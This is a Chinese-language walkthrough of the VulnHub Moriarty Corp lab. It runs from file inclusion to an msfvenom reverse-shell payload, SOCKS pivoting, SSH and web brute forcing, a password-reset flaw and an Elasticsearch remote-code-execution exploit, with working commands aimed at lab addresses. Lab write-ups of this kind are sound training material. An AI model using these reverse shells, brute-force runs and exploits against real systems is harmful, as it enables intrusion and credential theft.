vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)

文章目录

  • 靶场环境
  • 主机发现
    • 利用nmap 进行二层扫描
    • 利用arp-scan扫描探测
  • 文件包含
    • 利用远程文件包含 执行木马
    • 通过 LFISuite自动化工具 利用文件包含漏洞
  • payload反弹
    • 利用msf框架实现payload反弹
  • 添加代理
    • 用msf配置代理服务器(已反弹payload)
    • 应用proxychains设置socks5代理
  • 内网探测
  • 暴力破解
  • 文件上传
  • SSH弱口令
    • 使用开源的暴力密码破解神器 - hydra
    • 使用msf中uxiliary/scanner/ssh/ssh_login模块
    • 连接ssh成功拿到目标文件
  • 任意密码修改
  • 远程代码执行
  • 总结

靶场环境

攻击机:kali(192.168.1.100)
目标机:Moriarty Corp(192.168.1.105) 内网(172.17.0.0/24)
这里用vmware搭建靶场扫描不到目标,改用VM_VirtualBox即可
网络配置如图:
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第1张图片

详细靶场说明请参考:

https://www.vulnhub.com/entry/boredhackerblog-moriarty-corp,456/

靶场下载地址:

Download (Mirror):

https://download.vulnhub.com/boredhackerblog/MoriartyCorp.ova

Download (Torrent):

https://download.vulnhub.com/boredhackerblog/MoriartyCorp.ova.torrent

主机发现

利用nmap 进行二层扫描

nmap -sn -PR -T 4 192.168.1.0/24

-sn:只进行主机发现,不进行端口扫描。
-PR:ARP Ping。

利用arp-scan扫描探测

arp-scan -I eth0 -l

vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第2张图片在这里插入图片描述

根据描述,访问8000端口
输入flag{start}开始任务

文件包含

根据提示,访问目标80端口
点击链接发现可能存在文件包含
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第3张图片存在文件包含漏洞
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第4张图片

利用远程文件包含 执行木马

在攻击机开启apache服务并将测试文件放入/var/www/html下
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第5张图片
成功解析目标文件
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第6张图片执行一句话木马

在这里插入图片描述
这里在攻击机是.txt 利用文件包含到目标机上解析php代码 因此木马执行在目标机上

蚁剑连接
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第7张图片vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第8张图片

通过 LFISuite自动化工具 利用文件包含漏洞

https://github.com/D35m0nd142/LFISuite
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第9张图片
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第10张图片
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第11张图片
提示内网环境中存在重要的网站,里面存在要获取的flag信息,并且告知内网范围在172.17.0.3-254段。由此,开始步入后渗透攻击阶段,由于靶场环境主要以linux系统环境为主,故此处后渗透工具在此处可选择metasploit工具
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第12张图片

payload反弹

利用msf框架实现payload反弹

msfvenom生成一个shell上传至目标

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=9999 -f elf > shell.elf

vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第13张图片vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第14张图片在kali上配置监听模块

msfconsole 
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.100
msf6 exploit(multi/handler) > set lport 9999
msf6 exploit(multi/handler) > run

目标机运行shell.elf

chmod u+x shell.elf
./shell.elf

成功反弹payload
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第15张图片

添加代理

用msf配置代理服务器(已反弹payload)

执行指令添加路由操作

run autoroute -s 172.17.0.0/24    #添加路由
run autoroute -p                  #查看路由情况

设置代理服务器

meterpreter > bg                        #会话挂后台
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy 
msf6 auxiliary(server/socks_proxy) > exploit

vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第16张图片

应用proxychains设置socks5代理

进行内网探测,配置proxychains,可让本地扫描器,软件流量也走代理

echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf

内网探测

proxychains nmap 172.17.0.0/24  -sT  -Pn  -T4 -p80

-sT 进行Tcp扫描探测
-Pn 禁ping扫描
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第17张图片使用代理浏览器访问目标内网

proxychains firefox 172.17.0.4:80

在这里插入图片描述
也可在浏览器配置代理进行访问,配置代理类型选择socks5,本地端口为1080。配置好以后,就能通过代理访问内网web应用
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第18张图片

暴力破解

该目标站点可以上传文件,同时需要密码 我们用burpsuite抓取上传数据包进行密码爆破
打开burpsuite后,需要添加代理,这样才能将拦截到的数据正确发送到目标服务器,配置过程如下所示:

vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第19张图片将浏览器设置为代理burpsuite8080端口
此时数据包通过burpsuite代理再通过socks代理进入内网

vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第20张图片利用burpsuite的Intruder模块爆破得到密码为password
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第21张图片

文件上传

利用密码password上传shell
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第22张图片
将蚁剑配置代理,连接上传的shell
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第23张图片

不成功多连接几次即可
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第24张图片连接成功找到flag(由于msf代理服务器不稳定 命令需要多执行几次)
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第25张图片

SSH弱口令

根据提示,内网有一个目标开启ssh服务
扫描内网22端口发现172.17.0.6开启ssh服务

proxychains nmap 172.17.0.0/24 -sT -Pn -T4 -p22

vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第26张图片
将提示的账号和密码(md5碰撞解密后)分别放在user.txt和password.txt

使用开源的暴力密码破解神器 - hydra

https://www.cnblogs.com/lxfweb/p/13176245.html

proxychains hydra -L user.txt -P password.txt ssh://172.17.0.6

在这里插入图片描述

使用msf中uxiliary/scanner/ssh/ssh_login模块

查看当前路由情况
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第27张图片

use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.17.0.6
rhosts => 172.17.0.6
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /var/www/html/password.txt
pass_file => /var/www/html/password.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file /var/www/html/user.txt
userpass_file => /var/www/html/user.txt
msf6 auxiliary(scanner/ssh/ssh_login) > run

成功拿到目标ssh服务账号密码(root:weapons)

连接ssh成功拿到目标文件

vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第28张图片

任意密码修改

将获取到的flag内容进行提交后,Moriarty Corp靶场给出新的提示。如下图所示,提示说存在一个聊天网站,管理员的聊天记录可能存在有价值的信息。并给出服务器开放端口可能在443,8000,8080,8888。

扫描内网443,8000,8080,8888端口

proxychains nmap 172.17.0.0/24 -sT -Pn -T4 -p443,8000,8080,8888

发现172.17.0.7开放了8000端口
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第29张图片

根据提示给出的用户名和口令进行登陆,查看网站具有两个功能,可以查看chats聊天记录,可以更改用户名密码。
尝试抓包,通过更改用户名为管理员,设置口令。
此时如果存在任意用户名口令更改漏洞,此时就可以把管理员登陆密码从新设置。

vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第30张图片
将username变量设为admin 即可修改管理员密码为123456

vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第31张图片
成功登录管理员账号

vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第32张图片
在chats聊天记录发现flag

vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第33张图片

远程代码执行

将获取到的flag内容进行提交后,Moriarty Corp靶场给出新的提示。如下图所示,文中提到一个web应用Elasticsearch。发现该服务使用端口是9200
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第34张图片

vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第35张图片扫描内网9200端口

proxychains nmap 172.17.0.0/24 -sT -Pn -T4 -p9200

vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第36张图片访问web站点 知道给服务版本为1.4.2
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第37张图片用kali自带漏洞版本搜索工具 searchexploit
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第38张图片
使用36337.py脚本执行远程代码执行攻击,获取shell权限

searchsploit -p 36337          #显示对应编号漏洞利用的完整路径
proxychains python /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.8

拿到shell
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第39张图片获取目标文件
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_第40张图片

总结

通过Moriarty Corp靶场,学习了内网渗透的基本流程。
主机发现:arp-scan、namp
文件包含:远程代码执行、LFISuite自动化工具
payload反弹:攻击机用msf中的multi/hander模块监听 目标机上传并执行msfvenom生成的木马
添加代理:添加路由后msf中使用server/socks_proxy模块配置代理服务器 并用proxychains使用代理

你可能感兴趣的:(渗透测试,vlunhub,内网渗透,渗透测试,ctf靶场)